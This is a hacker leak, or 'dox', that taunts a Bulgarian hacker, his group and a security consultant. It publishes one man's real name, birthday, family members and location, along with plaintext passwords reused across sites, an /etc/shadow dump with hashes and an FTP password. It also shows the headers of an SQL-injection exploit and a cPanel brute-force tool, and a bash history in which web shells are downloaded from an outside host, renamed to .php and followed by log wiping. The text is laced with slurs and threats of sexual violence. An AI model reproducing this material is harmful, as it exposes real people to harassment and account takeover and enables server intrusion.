1. __________ __ _____ __________.__
  2. \______ \__ _ _______/ |_ / | | \______ \ |__ __ __ ____
  3. | ___/\ \/ \/ / \ __\ / | |_ | ___/ | \| | \/ \
  4. | | \ / | \ | / ^ / | | | Y \ | / | \
  5. |____| \/\_/|___| /__| \____ | |____| |___| /____/|___| /
  6. \/ |__| \/ \/
  7. LOL > SlaserX < LOL
  8. LOL > Pirate-Sky < LOL
  9. LOL > SecurityGuy < LOL
  10. * LOL * SlaserX * LOL *
  11. SlaserX is a well-known criminal and wannabe hacker from Bulgaria. He's been around for quite some time now. A few weeks ago the miserable idiot and his fellow minions got finally busted and the misguided cops mistakenly claimed to have arrested the most powerful hacker group in Bulgaria[1]. Wait, what?!
  12. Cops, Y U so unbelievably stupid? You're nothing but miserable media whores. We've been fucking around with these kids and we certainly know how 1337 they are. We've got their passwords, we've been reading through their mail spools, we've been laughing at their hacking attempts and yet, you call them the most powerful hacker group. Yes, some of the most talented hackers worldwide are actually based in Eastern Europe, but you silly bitches won't ever hear about them. Suck on my hard cock and and die, brainless cunts! How the fuck can you even be so stupid and lame?
  13. Take a seat, enjoy this leak and remember.. this is absolutely nothing compared to what we've done to you, idiots.
  14. [1] http://press.mvr.bg/en/News/news120704_08.htm
  15. >> So, who's this guy?
  16. First Name: Ivan
  17. Last Name: Bachvarov
  18. Nickname: SlaSerX
  19. Birthday: 21.07.1986
  20. Height: 1.76cm
  21. Father: Jecho Bachvarov
  22. Sister: Mariana Bachvarova
  23. Girlfriend: Mihaela Mandalcheva
  24. Location: Burgas, Bulgaria
  25. >> Let's take a look at what his passwords look like.
  26. vbox7.com (slaserx:1986125),
  27. hit.bg (slaserx:1986125),
  28. theunkn0wn.org (slaserx:1986125),
  29. kaldata.com (slaserx:1986125),
  30. bghelp.bg (slaserx:1986125),
  31. etc.
  32. >> Yes, password reusage is so typical for these idiots. You still call yourself a hacker? Here are some of his already owned mail boxes.
  33. >> Guess how 1337 his passwords were? ;) Now let's take a look at some of his boxes.
  34. [email protected]:/root# uname -a
  35. Linux bgdns 2.6.32-5-686 #1 SMP Wed Jan 12 04:01:41 UTC 2011 i686 GNU/Linux
  36. 23:15:45 up 6:26, 2 users, load average: 0.08, 0.09, 0.09
  37. USER TTY FROM [email protected] IDLE JCPU PCPU WHAT
  38. root pts/0 office 16:51 6:23m 0.42s 0.42s -bash
  39. root pts/1 office 17:37 5:17m 0.34s 0.34s -bash
  40. [email protected]:/root# cat /etc/shadow
  41. root:$6$OeWqv5cY$zN9ZVm79q0KLjbsWI.HG0MMlUPiv6c2PrOtYwHJt1UFtcgXwhIgY63u0ZQuMXnWlUN4rKCDbf9Qb7jwC.Bdpp.:15024:0:99999:7:::
  42. daemon:*:15024:0:99999:7:::
  43. bin:*:15024:0:99999:7:::
  44. sys:*:15024:0:99999:7:::
  45. sync:*:15024:0:99999:7:::
  46. games:*:15024:0:99999:7:::
  47. man:*:15024:0:99999:7:::
  48. lp:*:15024:0:99999:7:::
  49. mail:*:15024:0:99999:7:::
  50. news:*:15024:0:99999:7:::
  51. uucp:*:15024:0:99999:7:::
  52. proxy:*:15024:0:99999:7:::
  53. www-data:*:15024:0:99999:7:::
  54. backup:*:15024:0:99999:7:::
  55. list:*:15024:0:99999:7:::
  56. irc:*:15024:0:99999:7:::
  57. gnats:*:15024:0:99999:7:::
  58. nobody:*:15024:0:99999:7:::
  59. libuuid:!:15024:0:99999:7:::
  60. Debian-exim:!:15024:0:99999:7:::
  61. statd:*:15024:0:99999:7:::
  62. sshd:*:15024:0:99999:7:::
  63. slaserx:$6$XW1z1pT4$h/y7KaZRtOjijhnQLV4nIeBwMggaX/WwPTCVEUasRnUwKMIs1NVA70/4EwE/wDQTsH/xgzYQeEgtaiP3NtEkx1:15031:0:99999:7:::
  64. postfix:*:15024:0:99999:7:::
  65. mysql:!:15024:0:99999:7:::
  66. bind:*:15024:0:99999:7:::
  67. polw:!:15024:0:99999:7:::
  68. postgrey:*:15024:0:99999:7:::
  69. proftpd:!:15024:0:99999:7:::
  70. ftp:*:15024:0:99999:7:::
  71. vmail:!:15024:0:99999:7:::
  72. vu2000:!:15024:0:99999:7:::
  73. vu2001:!:15024:0:99999:7:::
  74. vu2002:!:15024:0:99999:7:::
  75. vu2003:!:15024:0:99999:7:::
  76. snmp:*:15025:0:99999:7:::
  77. vu2004:!:15025:0:99999:7:::
  78. vu2005:!:15031:0:99999:7:::
  79. vu2006:!:15034:0:99999:7:::
  80. vu2007:!:15034:0:99999:7:::
  81. vu2008:!:15035:0:99999:7:::
  82. messagebus:*:15038:0:99999:7:::
  83. lbcd:*:15038:0:99999:7:::
  84. vu2009:!:15039:0:99999:7:::
  85. >> Ever wondered what the most powerful hacker tools look like? Well, take look..
  86. [email protected]:/root# head -25 l33t/a.pl
  87. #!/usr/bin/perl
  88. use IO::Socket;
  89. print q{
  90. #######################################################################
  91. # vBulletin. Version 4.0.1 Remote SQL Injection Exploit #
  92. # By indoushka #
  93. # www.iq-ty.com/vb #
  94. # Souk Naamane (00213771818860) #
  95. # Algeria Hackerz ([email protected]) #
  96. # Dork: Powered by vBulletin. Version 4.0.1 #
  97. #######################################################################
  98. };
  99. if (!$ARGV[2]) {
  100. print q{
  101. Usage: perl VB4.0.1.pl host /directory/ victim_userid
  102. perl VB4.0.1.pl www.vb.com /forum/ 1
  103. };
  104. [email protected]:/root# head -5 l33t/gen
  105. #!/usr/bin/perl
  106. ##
  107. ### bren.pl . Generate every character combination for 15 characters in length(ughh.)
  108. ##
  109. #
  110. [email protected]:/root# head -30 l33t/t.pl
  111. #!/usr/bin/perl
  112. use IO::Socket;
  113. use LWP::Simple;
  114. use MIME::Base64;
  115. $host = $ARGV[0];
  116. $user = $ARGV[1];
  117. $port = $ARGV[2];
  118. $list = $ARGV[3];
  119. $file = $ARGV[4];
  120. $url = "http://".$host.":".$port;
  121. if(@ARGV < 3){
  122. print q(
  123. ###############################################################
  124. # Cpanel Password Brute Force Tool #
  125. ###############################################################
  126. # usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
  127. #-------------------------------------------------------------#
  128. # [Host] : victim Host (simorgh-ev.com) #
  129. # [User] : User Name (demo) #
  130. # [PORT] : Port of Cpanel (2082) #
  131. #[list] : File Of password list (list.txt) #
  132. # [File] : file for save password (password.txt) #
  133. # #
  134. ###############################################################
  135. # (c)oded By Hessam-x / simorgh-ev.com #
  136. ###############################################################
  137. );exit;}
  138. [email protected]:/root# tar tvf tools.tar
  139. drwxr-xr-x root/root 0 2011-02-11 11:14 tools/
  140. -rwxr-xr-x root/root 904 2011-01-15 18:18 tools/stop.flood
  141. -rwxr-xr-x root/root 700 2011-01-15 18:21 tools/monitor
  142. -rw-r--r-- slaserx/slaserx 1800 2011-02-11 11:11 tools/shells.zip
  143. -rwxr-xr-x root/root 1853 2011-02-07 18:30 tools/check.ssh
  144. drwxr-xr-x root/root 0 2011-01-16 19:45 tools/sms/
  145. -rwxr-xr-x root/root 1360 2011-01-16 19:26 tools/sms/212.70.159.86
  146. -rwxr-xr-x root/root 1332 2011-01-16 19:41 tools/sms/212.70.159.82-m
  147. -rwxr-xr-x root/root 1326 2011-01-16 19:42 tools/sms/212.70.159.86-m
  148. -rwxr-xr-x root/root 1271 2011-01-16 19:30 tools/sms/7.7.7.7
  149. -rwxr-xr-x root/root 1331 2011-01-16 19:43 tools/sms/212.70.159.87-m
  150. -rwxr-xr-x root/root 630 2011-01-19 09:47 tools/sms/run
  151. -rwxr-xr-x root/root 1333 2011-01-16 19:42 tools/sms/212.70.159.83-m
  152. -rwxr-xr-x root/root 1365 2011-01-16 19:27 tools/sms/212.70.159.87
  153. -rwxr-xr-x root/root 1367 2011-01-16 18:50 tools/sms/212.70.159.83
  154. -rwxr-xr-x root/root 1366 2011-01-16 18:49 tools/sms/212.70.159.82
  155. -rwxr-xr-x root/root 1332 2011-01-16 19:40 tools/sms/94.156.142.99-m
  156. -rwxr-xr-x root/root 1366 2011-01-16 18:45 tools/sms/94.156.142.99
  157. -rwxr-xr-x root/root 528 2011-01-15 18:20 tools/unban
  158. -rwxr-xr-x root/root 526 2011-01-15 18:19 tools/ban
  159. -rwxr-xr-x root/root 136 2011-01-15 18:36 tools/grep.404
  160. -rwxr-xr-x root/root 468 2011-01-15 18:35 tools/logged
  161. -rwxr-xr-x root/root 302 2011-01-15 18:22 tools/dellog
  162. -rw-r--r-- root/root 14 2011-02-07 18:30 tools/bannedips.txt
  163. drwxr-xr-x root/root 0 2011-02-11 14:38 tools/shells/
  164. -rwxr-xr-x root/root 143 2010-07-16 13:41 tools/shells/find.r57
  165. -rwxr-xr-x root/root 12 2010-07-16 13:45 tools/shells/a
  166. -rwxr-xr-x root/root 144 2010-07-16 13:56 tools/shells/find.eval
  167. -rwxr-xr-x root/root 178 2010-07-16 14:35 tools/shells/find.shell
  168. -rwxr-xr-x root/root 144 2010-07-16 13:45 tools/shells/find.rt13
  169. -rwxr-xr-x root/root 153 2010-07-16 13:49 tools/shells/find.decode
  170. -rwxr-xr-x root/root 34461 2011-02-11 14:40 tools/shells/scan.txt
  171. -rwxr-xr-x root/root 143 2010-06-30 14:57 tools/shells/find.c99
  172. drwxr-xr-x root/root 0 2011-02-04 20:46 tools/backup/
  173. -rwxr-xr-x root/root 641 2011-02-04 20:44 tools/backup/backup-rsbg
  174. -rwxr-xr-x root/root 657 2011-02-04 20:45 tools/backup/backup-slaserx
  175. -rwxr-xr-x root/root 271 2011-02-07 11:23 tools/backup/run
  176. -rwxr-xr-x root/root 650 2011-02-04 20:41 tools/backup/backup-psc
  177. [email protected]:/root# tar tzvf t.tar.gz
  178. drwxr-xr-x root/root 0 2011-03-01 20:20 l33t/
  179. -rwxr-xr-x root/root 2358 2011-02-28 17:26 l33t/a.pl
  180. -rwxr-xr-x root/root 961923 2011-02-27 01:31 l33t/list.txt
  181. -rwxr-xr-x root/root 18883 2010-12-20 01:09 l33t/slowloris.pl
  182. -rwxr-xr-x root/root 156 2011-03-01 18:17 l33t/test.txt
  183. -rwxrwxrwx root/root 11 2011-02-28 17:26 l33t/a
  184. -rwx--x--x root/root 66502 2011-02-27 06:46 l33t/list.txt.save
  185. -rw-r--r-- root/root 20056 2011-03-01 20:21 l33t/ssh2ftpcrack.tar.bz2
  186. -rwxr-xr-x root/root 2109 2011-02-27 00:51 l33t/t.pl
  187. -rwxr-xr-x root/root 6359 2011-02-27 00:52 l33t/gen
  188. [email protected]:/root# cat .bash_alias
  189. # some more ls aliases
  190. alias less='less -SR'
  191. alias l='ls -lLBhX --time-style=locale'
  192. alias la='ls -la $1 | less'
  193. alias ll='ls -lX'
  194. alias lx='ls -lXB' #sort by ext
  195. alias lk='ls -lSr' #soft by size
  196. # Alias's to modifed commands
  197. alias ps='ps auxf'
  198. alias home='cd ~'
  199. alias pg='ps aux | grep' #requires an argument
  200. alias lg='ls -la | grep' #requires an argument
  201. alias un='tar -zxvf'
  202. alias df='df -hT'
  203. alias ping='ping -c 10'
  204. #alias net-restart='sudo /etc/init.d/networking restart'
  205. #alias windir="cd '/home/hkvn/.wine/drive_c/Program Files'"
  206. alias ..='cd ..'
  207. alias update='sudo apt-get update'
  208. alias upgrade='sudo apt-get upgrade'
  209. alias install='sudo apt-get install'
  210. alias remove='sudo apt-get remove'
  211. #alias eclipse='eclipse -vmargs -Xmx512M'
  212. #alias firefox='firefox-3.5'
  213. alias ipconfig='ifconfig -a'
  214. #My alias
  215. alias flood='netstat'
  216. alias stop='/root/tools/stop.flood'
  217. alias ban='/root/tools/ban.pl'
  218. alias unban='/root/tools/unban.pl'
  219. alias monitor='/root/tools/monitor.sh'
  220. alias cron='env EDITOR=nano crontab -e'
  221. alias editcfg='pico /var/www/ispcp/gui/index.php'
  222. alias arest='/etc/init.d/apache2 restart'
  223. alias cls='clear'
  224. alias q='exit'
  225. # Some ssh connections
  226. alias shell='ssh -l slaserx slaserx.ath.cx'
  227. #alias xalo='sudo vpnc-connect xalo.conf'
  228. # Some ping commands
  229. #alias pga='ping 192.168.1.1 -c 10'
  230. #alias pgo='ping google.com -c 10'
  231. #alias phk='ping hkvn.info -c 10'
  232. #alias pch='ping chuyenhungyen.org -c 10'
  233. #Some chmod commands
  234. alias mx='chmod a+x'
  235. alias 000='chmod 000'
  236. alias 644='chmod 644'
  237. alias 755='chmod 755'
  238. # cat .bash_history
  239. clear
  240. nmap localhost
  241. exit
  242. host perfektno.com
  243. w
  244. iptables -L |grep 77.78.36.40
  245. ban 77.78.36.40
  246. pico /etc/init.d/firewall
  247. ls -a
  248. iptables -L
  249. clear
  250. search metaspolit
  251. search metasploit
  252. search icmp rate
  253. pico /etc/init.d/firewall
  254. iptables -L
  255. stop
  256. flood
  257. clear
  258. exit
  259. pico /etc/networks
  260. pico /etc/network/interfaces
  261. exit
  262. host cs-adrenalines.info
  263. host 79.124.67.194
  264. stop
  265. flood
  266. cat /var/log/fail2ban.log
  267. cat /var/log/psad/fw_check
  268. cat /var/log/psad/top_attackers
  269. clear
  270. clear
  271. stop
  272. exit
  273. cd l33t/
  274. wget https://cirt.net/nikto/nikto-2.1.4.tar.bz2
  275. ls -a
  276. wget
  277. wget --help
  278. wget --help |grep ssl
  279. wget --no-check-certificate https://cirt.net/nikto/nikto-2.1.4.tar.bz2
  280. tar -jxvf nikto-2.1.4.tar.bz2
  281. cd nikto-2.1.4/
  282. ls -a
  283. ./nikto.pl
  284. ./nikto.pl -host abv.bg -root
  285. ./nikto.pl -host abv.bg -root+
  286. ./nikto.pl -host abv.bg
  287. ./nikto.pl
  288. ./nikto.pl -host
  289. ./nikto.pl -host pweb.co.cc
  290. w
  291. last
  292. flood
  293. stop
  294. apachectl restart
  295. stop
  296. apachectl restart
  297. cd /root/tools/
  298. ./dellog
  299. cat /var/log/apache2/pirate-sky.info-combined.log
  300. cat /var/log/apache2/pirate-sky.info-combined.log
  301. cat /var/log/apache2/pirate-sky.info-combined.log
  302. iptables -L
  303. host eco.gov.kz
  304. cat /var/log/apache2/pirate-sky.info-combined.log
  305. apachectl restart
  306. apachectl restart
  307. ls -a
  308. cron
  309. cron
  310. /etc/init.d/cron restart
  311. cd /var/www/virtual/warez-database.org/htdocs/
  312. ls -a
  313. cd hooks/
  314. ls -a
  315. cd ..
  316. ls -a
  317. cd converge_local/
  318. ls -a
  319. ls -a
  320. ls -a
  321. wget xpls.hit.bg/shell/shell.gif
  322. rm -rf shell.gif
  323. wget xpls.hit.bg/shell/linuxbg.shell
  324. wget xpls.hit.bg/shell/linuxbg.gif
  325. rm -rf linuxbg.*
  326. ls -a
  327. ls -a
  328. mv /home/slaserx/faq.php ./
  329. ls -a
  330. rm -rf .htaccess
  331. ls -a
  332. rm -rf faq.php
  333. /
  334. cd /
  335. pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
  336. pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
  337. clear
  338. whois privatecrew.net
  339. whois privatecrew.net
  340. whois bgdns.info
  341. host freebsd.bg
  342. clear
  343. genpasswd
  344. clear
  345. genpasswd
  346. genpasswd
  347. genpasswd
  348. ls -a
  349. cd /var/www/virtual/privatecrew.net/htdocs/
  350. ls -s
  351. ls -a
  352. rm -rf *
  353. ls -a
  354. ls -a
  355. cd ..
  356. cp ../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
  357. ls -a
  358. cat ../pirate-sky.info/htdocs/conf_global.php
  359. ls -a
  360. cp pirate-sky.info-backup-2011.03.06-000737.tar.bz2 backups/
  361. clear
  362. ls -a
  363. rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  364. rm -rf backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  365. genpasswd
  366. genpasswd
  367. genpasswd
  368. ls -a
  369. cd htdocs/
  370. ls -a
  371. pico /etc/init.d/firewall
  372. cat /etc/init.d/firewall
  373. iptables -t filter -A INPUT -s 95.42.32.36 -j ACCEPT
  374. pico /etc/init.d/firewall
  375. /etc/init.d/firewall
  376. flood
  377. stop
  378. ls -a
  379. iptables -L |grep 94.156.142.66
  380. iptables -L |grep lucifer
  381. stop
  382. iptables -L |grep 95.42.32.36
  383. iptables -L
  384. cd /var/www/fcgi/
  385. ls -a
  386. pico warez-database.org/php5/php.ini
  387. pico privatecrew.net/php5/php.ini
  388. pico privatecrew.net/php5/php.ini
  389. apachectl restart
  390. pico privatecrew.net/php5/php.ini
  391. apachectl restart
  392. ls -a
  393. pico pirate-sky.com/php5/php.ini
  394. pico privatecrew.net/php5/php.ini
  395. apachectl restart
  396. cd /root/tools/
  397. ls -a
  398. cd shells/
  399. pico new.p
  400. pico new
  401. ls -a
  402. ./a
  403. ls -a
  404. pico find.r57
  405. pico new
  406. ./find.
  407. ./new
  408. ls -a
  409. ls -a
  410. cd /var/www/virtual/
  411. ls -a
  412. cd privatecrew.net/htdocs/
  413. cd /root/tools/
  414. cd shells/
  415. ./new
  416. ls -a
  417. pico new
  418. pico find.eval
  419. ls -a
  420. pico new
  421. pico new
  422. ./new
  423. ls -a
  424. pico new
  425. ls -a
  426. ./new
  427. ls -a
  428. pico new
  429. ls -a
  430. ./new
  431. pico new
  432. ./new
  433. ls -a
  434. rm -rf new
  435. pico find.shell
  436. cat scan.txt
  437. pico scan.txt
  438. rm -rf scan.txt
  439. ls -a
  440. ./find.shell
  441. ls -a
  442. cat scan.txt
  443. ls -a
  444. rm -rf scan.txt
  445. cat sc
  446. ls -a
  447. pico find.shell
  448. pico find.shell
  449. ./find.shell
  450. cat scan.txt
  451. rm -rf scan.txt
  452. ls -a
  453. ./find.shell
  454. cat scan.txt
  455. cat scan.txt |grep faq.php
  456. ls -a
  457. rm -rf scan.txt
  458. pico /var/www/virtual/privatecrew.net/htdocs/faq.php
  459. pico find.shell
  460. ls -a
  461. ./find.
  462. ./find.shell
  463. cat scan.txt
  464. ls -a
  465. clear
  466. cd /var/www/virtual/
  467. ls -a
  468. cd privatecrew.net/
  469. ls -a
  470. cd htdocs/
  471. cd 0893552070/
  472. ls -a
  473. wget http://xpls.hit.bg/shell/c99.gif
  474. wget http://xpls.hit.bg/shell/devil.gif
  475. wget http://xpls.hit.bg/shell/linux.gif
  476. ls -a
  477. mv linux.gif linux.php
  478. ls -a
  479. mv devil.gif devil.php
  480. mv c99.gif c99.php
  481. ls -a
  482. wget http://xpls.hit.bg/shell/shell.gif
  483. mv shell.gif shell.php
  484. ls -a
  485. ls -a
  486. ls -a
  487. ls -a
  488. ls -a
  489. ls -a
  490. ls -a
  491. cp linux.php /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/
  492. rm -rf /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/linux.php
  493. ls -a
  494. ls -a
  495. ls -a
  496. clear
  497. ls -a
  498. cd ..
  499. rm -rf 0893552070/
  500. ls -a
  501. exit
  502. ls -a
  503. ls -a
  504. cd /var/www/virtual/pirate-sky.
  505. cd /var/www/virtual/privatecrew.net/htdocs/
  506. ls -a
  507. cd a
  508. ls -a
  509. cd asd/
  510. ls -a
  511. ls -a
  512. ls -a
  513. ls -a
  514. ls -a
  515. ls -a
  516. ls -a
  517. ls -a
  518. ls -a
  519. ls -a
  520. ls -a
  521. ls -a
  522. ls -a
  523. ls -a
  524. ls -a
  525. ls -a
  526. ls -a
  527. rm crontab -l
  528. crontab -l
  529. ls -a
  530. ls -a
  531. ls -a
  532. ls -a
  533. ls -a
  534. ls -a
  535. ls -a
  536. cd ..
  537. ls -a
  538. ls -a
  539. rm -rf admin/
  540. rm -rf cache/
  541. rm -rf con*
  542. ls -a
  543. rm -rf includes/
  544. ls -a
  545. ls -a
  546. rm -rf interface/
  547. rm -rf ips_kernel/
  548. ls -a
  549. rm -rf public/
  550. rm -rf starforum/
  551. ls -a
  552. rm -rf uploads/
  553. ls -a
  554. ls -a
  555. ls -a
  556. cd ..
  557. cd htdocs/
  558. cd ..
  559. cd backups/
  560. ls -a
  561. cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  562. cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
  563. ls -a
  564. pico /etc/crontab
  565. ls -a
  566. cd ..
  567. ls -a
  568. cd htdocs/
  569. ls -a
  570. cd ..
  571. cd backups/
  572. rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  573. cd ..
  574. cd htdocs/
  575. cd pp/
  576. ls -a
  577. ls -a
  578. ls -a
  579. ls -a
  580. ls -a
  581. ls -a
  582. host mikrotik-bg.net
  583. host 195.191.149.89
  584. cat /var/log/cron.log
  585. ls -a
  586. crontab -l
  587. cron
  588. /etc/init.d/cron restart
  589. /etc/init.d/cron status
  590. ls -a
  591. ls -a
  592. cat /var/log/cron.log
  593. cat /var/log/cron.log |grep err
  594. clear
  595. ls -a
  596. ls -a
  597. ls -a
  598. ls -a
  599. ls -a
  600. ls -a
  601. ls -a
  602. ls -a
  603. ls -a
  604. ls -a
  605. ls -a
  606. ls -a
  607. cat /var/log/cron.log
  608. ls -a
  609. ls -a
  610. crontab -l
  611. ls -a
  612. ls -a
  613. cat /var/log/cron.log
  614. ls -a
  615. ls -a
  616. ls -a
  617. ls -a
  618. ls -a
  619. ls -a
  620. ls -a
  621. ls -a
  622. ls -a
  623. ls -a
  624. ls -a
  625. ls
  626. ls
  627. ls -a
  628. ls -a
  629. ls -a
  630. ls -a
  631. ls -a
  632. ls -la
  633. ls -a
  634. ls -a
  635. ls -a
  636. ls -a
  637. ls -a
  638. cat /var/log/cron.log
  639. ls -a
  640. ls -a
  641. ls -a
  642. ls -a
  643. ls -a
  644. ls -a
  645. wget xpls.hit.bg/shell.gif
  646. wget xpls.hit.bg/linux.gif
  647. mv linux.gif linux.php
  648. mv shell.gif shell.php
  649. ls -a
  650. ls -a
  651. ls -a
  652. ls -a
  653. ls -a
  654. ls -a
  655. ls -a
  656. ls -a
  657. rm -rf /tmp/scan.txt
  658. ls -a
  659. ls -a
  660. ls -la
  661. ls -a
  662. ls -a
  663. ls -a
  664. pico linux.php
  665. ls -a
  666. rm -rf linux.php
  667. rm -rf shell.php
  668. ls -a
  669. ls -a
  670. wget xpls.hit.bg/shell/shell.gif
  671. wget xpls.hit.bg/shell/linux.gif
  672. mv linux.gif linux.php
  673. mv shell.gif shell.php
  674. pico shell.php
  675. ls -a
  676. pico shell.php
  677. ls -a
  678. wget xpls.hit.bg/shell/shell.gif
  679. mv linux.gif linux.php
  680. wget xpls.hit.bg/shell/linux.gif
  681. ls -a
  682. mv linux.gif linux.php
  683. mv shell.gif shell.php
  684. ls -a
  685. ls -a
  686. ls -a
  687. ls -a
  688. ls -a
  689. cat /tmp/scan.txt
  690. ls -a
  691. ls -a
  692. ls -a
  693. ls -a
  694. cat /var/log/cron.log
  695. ls -a
  696. ls -a
  697. ls -a
  698. ls -a
  699. ls -a
  700. ls -a
  701. ls -a
  702. ls -a
  703. ls -a
  704. cd ..
  705. cd ..
  706. cd ..
  707. cd ..
  708. exit
  709. cd /var/www/virtual/
  710. ls -a
  711. cd linuxbg.info/
  712. cd backups/
  713. ls -a
  714. rm -rf t3es_vb.sql.bz2
  715. ls -a
  716. rm -rf t3es_soze.sql.bz2
  717. ls -a
  718. whois cms-bg.com
  719. whois jump.bg
  720. stop
  721. cat /tmp/scan.txt
  722. cat /var/log/apache2/other_vhosts_access.log
  723. cat /var/log/apache2/default-error.log
  724. clear
  725. cat /var/log/apache2/default-error.log
  726. clear
  727. cat /var/log/apache2/default-error.log
  728. cat /var/log/apache2/default-error.log
  729. cat /var/log/apache2/default-error.log
  730. clear
  731. clear
  732. clear
  733. exit
  734. os -a
  735. pico /etc/init.d/firewall
  736. ping abv.bg
  737. ls -a
  738. exit
  739. [email protected]:/root/tools/backup# cat backup-psc
  740. #!/bin/sh
  741. #Created by SlaSerX
  742. #red='1;31m'
  743. TARGET_EMAIL="[email protected]"
  744. # local directory to pickup *.tar.gz file
  745. tar zcvf /backup/psc/pirate-sky.$(date +%s).$(date +"%d-%m-%Y").tgz /var/www/virtual/pirate-sky.com/backups/
  746. # ftp remote connections
  747. FTPU="backup" # ftp login name
  748. FTPP="1986125" # ftp password
  749. FTPS="85.217.204.199" # remote ftp server
  750. FTPF="/home/backup/psc/" # remote ftp server directory for $FTPU & $FTPP
  751. LOCALD="/backup/psc/*.tgz"
  752. ncftpput -m -u $FTPU -p $FTPP $FTPS $FTPF $LOCALD
  753. echo
  754. echo -e " \e[${red} Upload psc Backup \e[m"
  755. echo 'pirate-sky' | mail -s "Backup Uploaded:" $TARGET_EMAIL
  756. echo
  757. [email protected]:/root/tools# head -10 check.ssh
  758. #!/usr/bin/perl
  759. ##############################################################################
  760. # By BumbleBeeWare.com 2006
  761. # SSH Log Checker
  762. # sshlogcheck.cgi
  763. # reads ssh log and blocks hacking attempts using ip tables
  764. ##############################################################################
  765. # CONFIGURE
  766. ##############################################################################
  767. [email protected]:/root/tools# cat dellog
  768. #!/bin/bash
  769. #Created by SlaSerX
  770. red='1;31m'
  771. /bin/rm -rf /var/log/apache2/*.log
  772. /bin/rm -rf /var/log/apache2/*.log.*
  773. /bin/rm -rf /var/log/apache2/users/*.log
  774. /bin/rm -rf /var/log/apache2/users/*.log.*
  775. /etc/init.d/apache2 restart
  776. echo -e " \e[${red} Apache logs Erase. Apache has been restarted\e[m"
  777. [email protected]:/root/tools# cat grep.404
  778. grep "404" /var/log/apache2/users/pirate-sky.com-access.log | grep "`date +%d/%b/%Y`" | mailx -s 'SUBJECT GOES HERE' 'r[email protected]'
  779. >> Refer to the URL at the end of the file for some more fun.
  780. * LOL * Pirate-Sky * LOL *
  781. Lamez.org, Pirate-Sky, World Warez Crew, CyberWarrior Invasion Group, etc. are all the same bitches and idiots again and again. They've been continuously renaming their own groups due to all kind of spectacular fails during the years. These are basically brainless infants playing with SQLmap and defacing outdated and improperly configured CMSs.
  782. You can clearly see how randomly they choose their targets -
  783. http://www.zone-h.org/archive/notifier=Cyber%20Warrior%20Invasion
  784. >> Check the aforementioned URL for their databases. ;)
  785. * LOL * SecurityGuy * LOL *
  786. Alexander Sverdlov a.k.a. the SecurityGuy is one of those pseudo-security whores that you'd like to publicly rape. This information security illiterate has been making money through consultancy and training services for ages. Giving your money to this miserable monkey will eventually boost your false sense of security, but nothing more or less. Beware of who you're entrusting your security decisions. Really.
  787. >> Let's just briefly review what's this bitch up to.
  788. [email protected] [/home/nopasara/public_html/securityguy]# uname -a
  789. Linux hera.superhosting.bg 2.6.18-194.32.1.el5 #1 SMP Wed Jan 5 17:52:25 EST 2011 x86_64 x86_64 x86_64 GNU/Linux
  790. [email protected] [/home/nopasara/public_html/securityguy]# id
  791. uid=32684(nopasara) gid=32686(nopasara) groups=32686(nopasara)
  792. [email protected] [/home/nopasara]# ls -lia
  793. total 28108
  794. 35897345 drwx--x--x 18 nopasara nopasara 4096 Mar 12 14:04 ./
  795. 2 drwx--x--x 660 root root 20480 Mar 19 16:50 ../
  796. 35897557 -rw------- 1 nopasara nopasara 3048 Jan 18 2010 .bash_history
  797. 35897347 -rw-r--r-- 1 nopasara nopasara 33 Dec 10 2008 .bash_logout
  798. 35897346 -rw-r--r-- 1 nopasara nopasara 176 Dec 10 2008 .bash_profile
  799. 35897348 -rw-r--r-- 1 nopasara nopasara 124 Dec 10 2008 .bashrc
  800. 35897357 -rw------- 1 nopasara nopasara 17 Dec 10 2008 .contactemail
  801. 35897376 drwx------ 5 nopasara nopasara 4096 Mar 4 11:07 .cpanel/
  802. 35897878 -rw------- 1 nopasara nopasara 15 Dec 31 2008 .cpanel-logs
  803. 35897520 -rw-r--r-- 1 nopasara nopasara 6 Mar 20 02:45 .dns
  804. 35897450 drwxr-x--- 7 nopasara nopasara 4096 Feb 25 2010 .fantasticodata/
  805. 35897436 -rw------- 1 nopasara nopasara 17 Feb 18 01:53 .ftpquota
  806. 35897353 drwxr-x--- 3 nopasara nobody 4096 Jan 4 2009 .htpasswds/
  807. 35897354 -rw------- 1 nopasara nopasara 12 Mar 4 10:44 .lastlogin
  808. 35897419 drwx------ 2 nopasara nopasara 4096 Dec 19 2008 .trash/
  809. 35898508 -rw------- 1 nopasara nopasara 1808 Jan 18 2010 .viminfo
  810. 35897374 lrwxrwxrwx 1 nopasara nopasara 34 Dec 10 2008 access-logs -> /usr/local/apache/domlogs/nopasara/
  811. 35946500 drwxr-xr-x 2 nopasara nopasara 4096 Nov 25 15:44 backups/
  812. 35897650 -rw-r----- 1 nopasara nopasara 1 Dec 27 2008 cpbackup-exclude.conf
  813. 36209930 drwxr-xr-x 3 nopasara nopasara 4096 Jul 26 2009 default/
  814. 35897906 drwxr-xr-x 2 nopasara nopasara 4096 Apr 12 2009 docs/
  815. 35897349 drwxr-x--- 3 nopasara mail 4096 Feb 6 16:07 etc/
  816. 36044801 drwx------ 2 nopasara nopasara 12288 Feb 28 15:20 logs/
  817. 35897351 drwxrwx--- 7 nopasara nopasara 4096 Apr 21 2010 mail/
  818. 35963400 drwxr-xr-x 2 nopasara nopasara 4096 Jan 16 2010 mysql/
  819. 35898497 -rw-r--r-- 1 nopasara nopasara 4128921 Jan 10 2010 nopasara_blog.sql
  820. 35897470 -rw-r--r-- 1 nopasara nopasara 723362 Feb 13 18:25 nopasara_emea.sql
  821. 35897856 -rw-r--r-- 1 nopasara nopasara 38813 Feb 15 13:28 php.ini
  822. 35932502 drwxr-xr-x 3 nopasara nopasara 4096 Jan 27 2010 procedures/
  823. 35897355 drwxr-xr-x 3 nopasara nopasara 4096 Nov 6 2005 public_ftp/
  824. 35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 public_html/
